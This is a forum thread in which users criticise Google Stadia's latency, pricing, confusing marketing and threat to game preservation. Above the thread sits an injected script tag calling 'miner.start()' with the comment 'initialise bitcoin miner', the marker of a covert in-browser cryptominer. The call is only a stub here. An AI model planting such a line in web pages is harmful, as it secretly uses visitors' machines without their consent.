<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectsmbx communitysmw central

Google Stadia

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
Arrietty

Re: Google Stadia

Postby Arrietty » 1 week ago

Honestly, I expected Stadia to not do so well, but surely enough it's a bigger disaster than I thought it would be. The fake confidences from their PR/Marketing folks was a big warning sign. And what little it brings to launch is surprisingly tiny to say the least.

Anyways, I'm kinda glad it flopped. I don't normally get happy over such petty things, but I absolutely would not want a future where we're at the mercy of no way to perserve games. Streaming services is fine as a side thing, but Google? They reallly wanted it to be THE way to play games, so screw that.

konaa

Postby konaa » 1 week ago

Maybe it's bad, but I've kinda been enjoying the trainwreck. The whole thing from the start seemed a little "arrogant tech company" to me. In a perfect world, I'd love to stream games. I've never had a great PC and I like the idea of a low commitment way to try out whatever the new hit game is. Back when OnLive was a thing, I tried it out and played about 3 hours of Just Cause 2 before forgetting about it forever. IMO that's a great thing that streaming could have going if it were on a netflix model.

Unfortunately google stadia has a bizarre and insane pricing model so that's off the table. Unfortunately latency issues are STILL awful (or so I hear) so that's an issue. And to cap it all off, the video compression means that even if you're getting 4k gameplay, it's going to crush the black tones and occasionally give you some shoddy picture quality.

I hate to be the guy who says "we're just not there yet" but I think that might be the case. In the back of my mind I was thinking "hey maybe google will do it - they're google, they've got the best programmers in the world." but I just don't think the infrastructure exists yet for quality videogame streaming. To add to that, they've had a completely borked messaging campaign to the point where people don't really even know WHAT the stadia is. My girlfriend and I have seen countless ads for the stadia and she asked me, "hey is that thing a console, or an app, or like a service or something?" and realistically I couldn't even answer. My answer was "it's kind of a console but also an app. At the moment, you need a really specific kind of chromecast and you also need the controller I think? but then you also need to sign up for the service but also buy games?"'

For those reasons I've basically just sat back and enjoyed the spectacle of everybody being pissed off and nothing going right. Everybody expected it to come and some people were optimistic anyway. I feel bad for them, but at least they knew it was a possibility (I understand this because I kickstarted the ouya for $100 lmao)

The whole thing seems like just another surface level convenience filled with many many deep impracticalities, which has basically defined the silicon valley ethos for the last 5-10 years. It's a party trick at worst, and a way of drumming up investor enthusiasm at worst. A part of me wonders if this was even ever about actually creating a game service, or if it was just for google to show their shareholders that they're trying to expand their business into new markets.

Awoo
Wolf girls? In *my* area? It's more likely than you think!
Pronouns: he/him/his

Re: Google Stadium but Crackers

Postby Awoo » 1 week ago

Peak Capitalism at its finest. Woo :partygator:
ワンワン :pal:

Ashan
The world has become a place

Postby Ashan » 1 week ago

I think there would have to be a drastic shakeup in terms of how the internet works before game streaming could be realistic. I don't blame Google for the latency and frames dropping and whatnot, I'm assuming they're sending over as much data as efficiently as possible, but there's just too many factors that can cause hiccups. Solving latency in games locally is already a difficult task, good luck trying to reduce it over giant distances of cables that are simultaneously pumping a ton of other data in every which direction at the same time.

So what I DO blame Google for is thinking this is something that could even work in the first place.

Stadia's death will be in Google's realization that it appeals to no one.
My theory is that the people using it now fall into one or both of 2 categories:
1. Tech nerds that like to try out new things because they're new
2. People who used to play video games and since grew out of them and were sold on the idea that it's because of the supposed "inconvenience" of buying a new console every 7 years, when really it's just that they grew out of video games.

Once the novelty of it being new and bold has worn off, who is gonna be the person shelling out $60 for every new release on Stadia?

konaa

Postby konaa » 1 week ago

Ashan wrote:
2. People who used to play video games and since grew out of them and were sold on the idea that it's because of the supposed "inconvenience" of buying a new console every 7 years, when really it's just that they grew out of video games.
This idea was floating in my brain but I couldn't quite figure out how to put it into words. I think you hit the nail on the head here. I don't like buying consoles, and I don't necessarily buy the new consoles when they came out (I got a ps4 like last year) but google wants to solve a hardware problem with software. I get it, I don't like buying new consoles. Maybe some people are excited for the generational leap, but I'm not. They're expensive and often have issues at launch. That said, hey, you gotta upgrade hardware sometimes. There's a limit to how much a piece of software can be optimized!

Return to “the cartridgé”